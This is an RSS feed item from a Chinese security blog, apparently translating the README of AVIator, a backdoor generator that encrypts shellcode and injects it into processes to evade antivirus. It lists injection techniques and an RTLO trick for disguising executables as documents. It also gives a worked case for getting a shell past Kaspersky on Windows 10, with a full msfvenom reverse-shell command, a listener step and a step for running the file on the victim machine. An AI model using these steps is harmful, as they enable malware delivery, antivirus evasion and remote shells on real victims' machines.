<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>进程 &#8211; ChaBug安全</title>
	<atom:link href="/tags/%E8%BF%9B%E7%A8%8B/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:16:32 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>AVIator：使用加密和注入技术来绕过AV检测 3/71</title>
		<link>/tools/658.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 06 Jul 2019 17:25:56 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[免杀]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[进程]]></category>
		<guid isPermaLink="false">/?p=658</guid>

					<description><![CDATA[Ator是一个后门生成器实用程序，它使用加密和注入技术来绕过AV检测。进一步来说： 它使用AES加密来加密给定的shellcode 生成包含加密有效负载的可执行文件 使用各种注入技...]]></description>
										<content:encoded><![CDATA[<div class="post-image"><img loading="lazy" class="alignnone size-medium" src="https://user-images.githubusercontent.com/4659186/56884557-d9899800-6a72-11e9-8bb5-95872da1407d.png" alt="AVIator：使用加密和注入技术来绕过AV检测 3/71-ChaBug安全" width="858" height="968" /></div>
<p><strong>Ator</strong>是一个后门生成器实用程序，它使用加密和<a class="tag_link" title="浏览关于“注入”的文章" href="/tags/%e6%b3%a8%e5%85%a5" target="_blank" rel="noopener noreferrer">注入</a>技术来绕过AV检测。进一步来说：</p>
<ul>
<li>它使用AES加密来加密给定的shellcode</li>
<li>生成包含加密有效负载的可执行文件</li>
<li>使用各种<span class="wpcom_tag_link"><a href="/tags/%e6%b3%a8%e5%85%a5" title="注入" target="_blank">注入</a></span>技术将shellcode解密并注入目标系统</li>
</ul>
<p>[ <a href="https://attack.mitre.org/techniques/T1055/" target="_blank" rel="nofollow noopener noreferrer">进程注入</a> ]：</p>
<ol>
<li>便携式可执行注入，包括将恶意代码直接写入<a class="tag_link" title="浏览关于“进程”的文章" href="/tags/%e8%bf%9b%e7%a8%8b" target="_blank" rel="noopener noreferrer">进程</a>（没有磁盘上的文件），然后使用其他代码或通过创建远程线程调用执行。注入代码的位移引入了重新映射内存引用的功能的附加要求。这种方法的变化，例如反射DLL注入（将自映射DLL写入<span class="wpcom_tag_link"><a href="/tags/%e8%bf%9b%e7%a8%8b" title="进程" target="_blank">进程</a></span>）和内存模块（写入进程时映射DLL）克服了地址重定位问题。</li>
<li>线程执行劫持涉及将恶意代码或DLL的路径注入进程的线程。与Process Hollowing类似，必须首先暂停该线程。</li>
</ol>
<h3>用法</h3>
<p>该应用程序有一个由三个主要输入组成的表单（见下面的截图）：</p>
<div class="post-image"><a class="fancybox" title="AVIator：使用加密和注入技术来绕过AV检测 3/71" href="https://user-images.githubusercontent.com/4659186/56884876-bca19480-6a73-11e9-8bbf-d249c4813e4e.png" target="_blank" rel="box noopener noreferrer"><img src="https://user-images.githubusercontent.com/4659186/56884876-bca19480-6a73-11e9-8bbf-d249c4813e4e.png" alt="AVIator：使用加密和注入技术来绕过AV检测 3/71-ChaBug安全" /></a></div>
<ol>
<li>包含用于加密shellcode的加密密钥的文本</li>
<li>包含用于AES加密的IV的文本</li>
<li>包含shellcode的文本</li>
</ol>
<p>重要提示：shellcode应作为C＃字节数组提供。</p>
<p>默认值包含执行notepad.exe（32位）的shellcode。提供此演示作为代码应如何形成的指示（使用msfvenom，可以使用-f csharp开关轻松完成，例如msfvenom -p windows / meterpreter / reverse_tcp LHOST = XXXX LPORT = XXXX -f csharp）。</p>
<p>在填充提供的输入并选择输出路径之后，根据所选择的选项生成可执行文件。</p>
<h3><a id="user-content-rtlo-option" class="anchor" href="https://github.com/Ch0pin/AVIator?tdsourcetag=s_pctim_aiomsg#rtlo-option" target="_blank" rel="nofollow noopener noreferrer" aria-hidden="true"></a>RTLO选项</h3>
<p>简单来说，欺骗可执行文件看起来像“无辜”扩展，如&#8217;pdf&#8217;，&#8217;txt&#8217;等。例如文件“testcod.exe”将被解释为“tesexe.doc”</p>
<p>请注意，某些AV会将恶搞作为恶意软件提醒自己。</p>
<h3><a id="user-content-set-custom-icon" class="anchor" href="https://github.com/Ch0pin/AVIator?tdsourcetag=s_pctim_aiomsg#set-custom-icon" target="_blank" rel="nofollow noopener noreferrer" aria-hidden="true"></a>设置自定义图标</h3>
<p>我想你们都知道它是什么:)</p>
<h3><a id="user-content-bypassing-kaspersky-av-on-a-win-10-x64-host-test-case" class="anchor" href="https://github.com/Ch0pin/AVIator?tdsourcetag=s_pctim_aiomsg#bypassing-kaspersky-av-on-a-win-10-x64-host-test-case" target="_blank" rel="nofollow noopener noreferrer" aria-hidden="true"></a>在Win 10 x64主机上绕过卡巴斯基AV（TEST CASE）</h3>
<p>在运行完全更新的卡巴斯基AV的Windows 10机器中获取shell</p>
<h4><a id="user-content-target-machine-windows-10-x64" class="anchor" href="https://github.com/Ch0pin/AVIator?tdsourcetag=s_pctim_aiomsg#target-machine-windows-10-x64" target="_blank" rel="nofollow noopener noreferrer" aria-hidden="true"></a>目标机器：Windows 10 x64</h4>
<ol>
<li>使用msfvenom创建有效负载<code>msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp</code></li>
<li>使用AVIator进行以下设置目标OS体系结构：x64
<p>注入技术：线程劫持（Shellcode Arch：x64，OS arch：x64）</p>
<p>目标程序：资源管理器（保留默认值）</li>
<li>在攻击者计算机上设置侦听器</li>
<li>在受害计算机上运行生成的exe</li>
</ol>
<h1>安装</h1>
<p><strong>Windows：</strong></p>
<p>编译项目或从以下文件夹下载allready编译的可执行文件：</p>
<p><a href="https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries" target="_blank" rel="nofollow noopener noreferrer">https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries</a></p>
<p><strong>Linux：</strong></p>
<p>根据您的Linux发行版安装Mono，下载并运行二进制文件</p>
<p>例如在kali：</p>
<div id="crayon-5d1778bfd7fd3344976172" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay">
<div class="crayon-tools">
<div class="crayon-button crayon-nums-button" title="Toggle Line Numbers">
<div class="crayon-button-icon"></div>
</div>
<div class="crayon-button crayon-plain-button" title="Toggle Plain Code">
<div class="crayon-button-icon"></div>
</div>
<div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap">
<div class="crayon-button-icon"></div>
</div>
<div class="crayon-button crayon-expand-button" title="Expand Code">
<div class="crayon-button-icon"></div>
</div>
<div class="crayon-button crayon-copy-button" title="Copy">
<div class="crayon-button-icon"></div>
</div>
<div class="crayon-button crayon-popup-button" title="Open Code In New Window">
<div class="crayon-button-icon"></div>
</div>
</div>
</div>
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1778bfd7fd3344976172-1">1</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5d1778bfd7fd3344976172-2">2</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1778bfd7fd3344976172-1" class="crayon-line"><span class="crayon-v">root</span><span class="crayon-sy">@</span><span class="crayon-v">kali</span><span class="crayon-p"># apt install mono-devel </span></div>
<div id="crayon-5d1778bfd7fd3344976172-2" class="crayon-line crayon-striped-line"><span class="crayon-v">root</span><span class="crayon-sy">@</span><span class="crayon-v">kali</span><span class="crayon-p"># mono aviator.exe</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>详细内容移步<a href="https://github.com/Ch0pin/AVIator" target="_blank" rel="nofollow noopener noreferrer">https://github.com/Ch0pin/AVIator</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
